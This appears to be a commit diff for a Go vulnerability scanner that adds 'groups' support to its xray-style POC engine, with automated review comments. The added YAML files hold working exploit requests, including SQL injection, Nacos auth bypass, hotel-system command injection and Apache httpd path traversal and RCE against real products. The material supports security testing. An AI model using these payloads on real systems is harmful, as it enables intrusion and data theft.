优化xray解析模块,支持groups、新增poc

影舞者 2021-11-16 11:53:46 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions


@ -45,10 +45,14 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
defer func() {
if conn != nil{
conn.Close()
}
}()
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
if err != nil {
return flag, err
@ -81,10 +85,14 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
defer func() {
if conn != nil{
conn.Close()
}
}()
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
if err != nil {
return flag, err
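Review bot: The deferred closure registered at lines 15–19, before the error check, is only correct because net.DialTimeout returns a nil Conn together with a non-nil error; the original one-line `defer conn.Close()` placed after `if err != nil` expressed the same lifetime more directly and needed no nil guard, so I would keep that form rather than the closure. If the closure stays, `if conn != nil{` needs a gofmt space, and in both variants the error from Close is dropped silently, which deserves a comment such as `// best-effort close; nothing useful to do with its error here`. The same change is made to RedisUnauth in the second hunk. Both functions continue beyond their hunks.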


@ -38,7 +38,7 @@ func Scan(info common.HostInfo) {
fmt.Println("start vulscan")
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" {
if info.Scantype == "all" || info.Scantype == "main"{
switch {
case info.Ports == "445":
//AddScan(info.Ports, info, ch, &wg) //smb
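Review bot: The new condition at line 51 introduces the literal "main" as a second scan type, but nothing in this hunk says what it selects or how it differs from "all"; a named constant shared with the flag parser (which is not visible here, so this is inferred) or at least a comment on the `if`, e.g. `// "main" runs the per-port service checks below like "all"; the difference lies in the modules outside this switch — TODO confirm`, would make the intent findable. The line is also missing the gofmt space before `{`. Scan starts and ends outside the hunk.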


@ -121,17 +121,17 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
}
}
res, err := http.NewRequest("GET", Url, nil)
req, err := http.NewRequest("GET", Url, nil)
if err == nil {
res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Set("Accept", "*/*")
res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
req.Header.Set("Accept", "*/*")
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Pocinfo.Cookie != "" {
res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
} else {
res.Header.Set("Cookie", "rememberMe=1")
req.Header.Set("Cookie", "rememberMe=1")
}
res.Header.Set("Connection", "close")
req.Header.Set("Connection", "close")
var client *http.Client
if flag == 1 {
@ -140,7 +140,7 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
client = lib.Client
}
resp, err := client.Do(res)
resp, err := client.Do(req)
if err == nil {
defer resp.Body.Close()
var title string
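Review bot: `resp, err := client.Do(req)` at line 85 declares a fresh err inside the `if err == nil` block, so a failed request never reaches the function's named error result (the signature is cut off at `(er`, so that it is a named `err` is inferred). The line had this shape before the rename, but since it was rewritten here it is the natural place to predeclare `var resp *http.Response` and use `resp, err = client.Do(req)` if the caller is meant to see the failure. geturl starts and ends outside the hunk.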


@ -32,9 +32,9 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
for i := 0; i < workers; i++ {
go func() {
for task := range tasks {
isVul, _ := executePoc(task.Req, task.Poc)
isVul, _ ,name:= executePoc(task.Req, task.Poc)
if isVul {
result := fmt.Sprintf("[+] %s %s", task.Req.URL, task.Poc.Name)
result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name,name)
common.LogSuccess(result)
}
wg.Done()
@ -53,7 +53,7 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
close(tasks)
}
func executePoc(oReq *http.Request, p *Poc) (bool, error) {
func executePoc(oReq *http.Request, p *Poc) (bool, error,string) {
c := NewEnvOption()
c.UpdateCompileOptions(p.Set)
if len(p.Sets) > 0 {
@ -65,13 +65,13 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
}
env, err := NewEnv(&c)
if err != nil {
//fmt.Printf("environment creation error: %s\n", err)
return false, err
fmt.Printf("[-] %s environment creation error: %s\n",p.Name,err)
return false, err, ""
}
req, err := ParseRequest(oReq)
if err != nil {
//fmt.Println("ParseRequest error",err)
return false, err
fmt.Printf("[-] %s ParseRequest error: %s\n",p.Name,err)
return false, err, ""
}
variableMap := make(map[string]interface{})
variableMap["request"] = req
@ -119,7 +119,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
out, err := Evaluate(env, p.Set["payload"], variableMap)
if err != nil {
//fmt.Println(p.Name," poc_payload error",err)
return false, err
return false, err, ""
}
variableMap["payload"] = fmt.Sprintf("%v", out)
}
@ -153,14 +153,21 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
}
success := false
//爆破模式,比如tomcat弱口令
if setslen > 0 {
if haspayload {
success, err = clusterpoc1(oReq, p, variableMap, req, env, setskeys)
} else {
success, err = clusterpoc(oReq, p, variableMap, req, env, setslen, setskeys)
}
} else {
for _, rule := range p.Rules {
return success, nil, ""
}
DealWithRule := func(rule Rules) (bool, error) {
var (
flag, ok bool
)
for k1, v1 := range variableMap {
_, isMap := v1.(map[string]string)
if isMap {
@ -201,7 +208,6 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
for k, v := range result {
variableMap[k] = v
}
//return false, nil
} else {
return false, nil
}
@ -211,14 +217,44 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
return false, err
}
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
success = false // 如果最后一步执行失败,就算前面成功了最终依旧是失败
//如果false不继续执行后续rule
// 如果最后一步执行失败,就算前面成功了最终依旧是失败
flag, ok = out.Value().(bool)
if !ok {
flag = false
}
return flag, nil
}
DealWithRules := func(rules []Rules) bool {
successFlag := false
for _, rule := range rules {
flag, err := DealWithRule(rule)
//if err != nil {
// fmt.Printf("[-] %s Execute Rule error: %s\n",p.Name,err.Error())
//}
if err != nil || !flag { //如果false不继续执行后续rule
successFlag = false // 如果其中一步为flag则直接break
break
}
success = true
successFlag = true
}
return successFlag
}
if len(p.Rules) > 0 {
success = DealWithRules(p.Rules)
} else { // Groups
for name, rules := range p.Groups {
success = DealWithRules(rules)
if success {
return success, nil, name
}
}
}
return success, nil
return success, nil, ""
}
func doSearch(re string, body string) map[string]string {
@ -308,7 +344,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
success, err = clustersend(oReq, variableMap, req, env, rule)
success, err = clustersend(oReq, variableMap, req, env, rule1)
if err != nil {
return false, err
}
@ -334,7 +370,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
success, err = clustersend(oReq, variableMap, req, env, rule)
success, err = clustersend(oReq, variableMap, req, env, rule1)
if err != nil {
return false, err
}
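Review bot: In the cluster branch at lines 143–151 the error from clusterpoc/clusterpoc1 is assigned to err and then discarded by `return success, nil, ""`; it should be `return success, err, ""` so a transport failure is not reported as "not vulnerable". The new result `(bool, error, string)` puts the error in the middle, whereas Go convention is error last, `(bool, string, error)`; reordering would also tidy the gofmt issues at lines 97 and 108. In DealWithRules the error from DealWithRule is swallowed (the print is commented out), so a rule that failed to evaluate becomes indistinguishable from one that returned false — at least emit it alongside the other `[-]` diagnostics this function prints. Iteration over p.Groups is map-ordered, so when two groups match, the name returned is nondeterministic; a comment on the loop should say so. executePoc continues beyond the hunk on both sides.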


@ -5,13 +5,40 @@ package lib
import (
"embed"
fmt "fmt"
proto "github.com/golang/protobuf/proto"
"fmt"
"github.com/golang/protobuf/proto"
"gopkg.in/yaml.v3"
math "math"
"math"
"strings"
)
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Sets map[string][]string `yaml:"sets"`
Rules []Rules `yaml:"rules"`
Groups map[string][]Rules `yaml:"groups"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
@ -356,36 +383,15 @@ var fileDescriptor_11b04836674e6f94 = []byte{
0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
}
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Sets map[string][]string `yaml:"sets"`
Rules []Rules `yaml:"rules"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
var pocs []*Poc
for _, f := range SelectPoc(Pocs, pocname) {
if p, err := loadPoc(f, Pocs); err == nil {
pocs = append(pocs, p)
}else {
fmt.Println("[-] load poc ",f," error:",err)
}
}
return pocs
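Review bot: The new `Groups` field on Poc has no doc comment and nothing records how it interacts with `Rules`; suggest `// Groups holds named alternative rule lists, tried until one matches; Rules takes precedence when both are set, and map iteration makes the try order unspecified.` (the precedence follows from executePoc in this commit). Separately, the struct has no fields for the `manual` and `transport` keys that the new POC files carry (lines 499–500, 549–550, 619–620), and yaml.v3's Unmarshal drops unknown keys silently, so POCs marked `manual: true` — which upstream xray uses for checks not meant to run in automatic scans (confirm against the xray docs) — are scheduled like any other. Add `Manual bool` with a `yaml:"manual"` tag and have the loader skip or gate them, or decode through a yaml.Decoder with KnownFields(true) so unsupported keys fail loudly instead of vanishing.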


@ -0,0 +1,16 @@
name: poc-yaml-74cms-sqli-1
set:
rand: randomInt(200000000, 210000000)
rules:
- method: POST
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
headers:
Content-Type: 'text/xml'
body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: betta(https://github.com/betta-cyber)
links:
- https://www.uedbox.com/post/29340


@ -0,0 +1,12 @@
name: poc-yaml-74cms-sqli-2
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: rexus
links:
- https://www.uedbox.com/post/30019/


@ -0,0 +1,10 @@
name: poc-yaml-74cms-sqli
rules:
- method: GET
path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
expression: |
response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
detail:
author: jinqi
links:
- https://www.t00ls.net/articles-54436.html


@ -0,0 +1,11 @@
name: poc-yaml-active-directory-certsrv-detect
rules:
- method: GET
path: /certsrv/certrqad.asp
follow_redirects: false
expression: |
response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
detail:
author: AgeloVito
links:
- https://www.cnblogs.com/EasonJim/p/6859345.html
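Review bot: The expression at line 366 tests `"Www-Authenticate" in response.headers` twice; one occurrence before the two `contains` calls is enough and reads more clearly. The duplicated header lookup does not change the result, so this is a style point only.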


@ -0,0 +1,10 @@
name: poc-yaml-airflow-unauth
rules:
- method: GET
path: /admin/
expression: |
response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- http://airflow.apache.org/


@ -0,0 +1,19 @@
name: poc-yaml-alibaba-canal-default-password
rules:
- method: POST
path: /api/v1/user/login
expression: |
response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
- method: POST
path: /api/v1/user/login
headers:
Content-Type: application/json
body: >-
{"username":"admin","password":"123456"}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.cnblogs.com/xiexiandong/p/12888582.html


@ -1,15 +0,0 @@
name: poc-yaml-alibaba-nacos-api-unauth
rules:
- method: GET
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
headers:
User-Agent: Nacos-Server
follow_redirects: true
expression: |
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
detail:
author: AgeloVito
info: alibaba-nacos-api-unauth
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424


@ -0,0 +1,27 @@
name: poc-yaml-alibaba-nacos-v1-auth-bypass
set:
r1: randomLowercase(16)
r2: randomLowercase(16)
rules:
- method: POST
path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes("create user ok!"))
- method: GET
path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes(r1))
- method: DELETE
path: "/nacos/v1/auth/users?username={{r1}}"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
detail:
author: kmahyyg(https://github.com/kmahyyg)
links:
- https://github.com/alibaba/nacos/issues/4593
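Review bot: This check is state-changing: rule 1 creates an account on the target, and the DELETE in rule 3 only runs if rule 2's expression also holds, because the engine in this commit stops at the first rule that returns false (DealWithRules in executePoc); a listing that misses the new user therefore leaves the account behind. Either arrange the cleanup so it always runs, or record the side effect in `detail` (e.g. `description: intrusive — creates and removes a temporary nacos user`) so operators can exclude it from routine scans. The same concern applies to other new files that write to the target without unconditional cleanup: amtt-hiboss at line 462 (drops a PHP file that is removed only when rule 2 fetches it), cacti-weathermap at line 730 (writes test.php into the plugin config directory with no cleanup) and couchdb at line 973 (creates an `_admin` user with no cleanup).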


@ -0,0 +1,18 @@
name: poc-yaml-amtt-hiboss-server-ping-rce
set:
r2: randomLowercase(10)
rules:
- method: GET
path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
expression: |
response.status == 200 && response.body.bcontains(b"parent.doTestResult")
- method: GET
path: /{{r2}}.php
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(r2)))
detail:
author: YekkoY
description: "安美数字-酒店宽带运营系统-远程命令执行漏洞"
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html


@ -0,0 +1,11 @@
name: poc-yaml-apache-ambari-default-password
rules:
- method: GET
path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide


@ -0,0 +1,24 @@
name: poc-yaml-apache-druid-cve-2021-36749
manual: true
transport: http
groups:
druid1:
- method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
druid2:
- method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
detail:
author: iak3ec(https://github.com/nu0l)
links:
- https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w


@ -7,8 +7,7 @@ rules:
path: /jars
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"address") && response.body.bcontains(b"files")
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
- method: POST
path: /jars/upload
headers:
@ -23,8 +22,7 @@ rules:
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
search: >-
(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
- method: DELETE


@ -0,0 +1,12 @@
name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
manual: true
transport: http
rules:
- method: GET
path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
follow_redirects: false
expression: response.status == 302 && response.headers["Location"] == "http://www.baidu.com/search/error.html"
detail:
author: Jarcis-cy(https://github.com/Jarcis-cy)
links:
- https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
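Review bot: The expression at line 557 depends on a third party: it holds only while baidu.com answers that path with a 302 to exactly `http://www.baidu.com/search/error.html`, and every scanned host is made to open an outbound connection to that site during the check. Expect false negatives whenever that endpoint changes, and note the external dependency in `detail` so operators know the traffic leaves the assessment boundary. The `manual: true` key at line 549 has no corresponding field in the Poc struct in this commit, so it has no effect here.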


@ -0,0 +1,16 @@
name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
groups:
cgibin:
- method: GET
path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
icons:
- method: GET
path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: JingLing(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ


@ -0,0 +1,14 @@
name: poc-yaml-apache-httpd-cve-2021-41773-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
body: echo;expr {{r1}} + {{r2}}
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
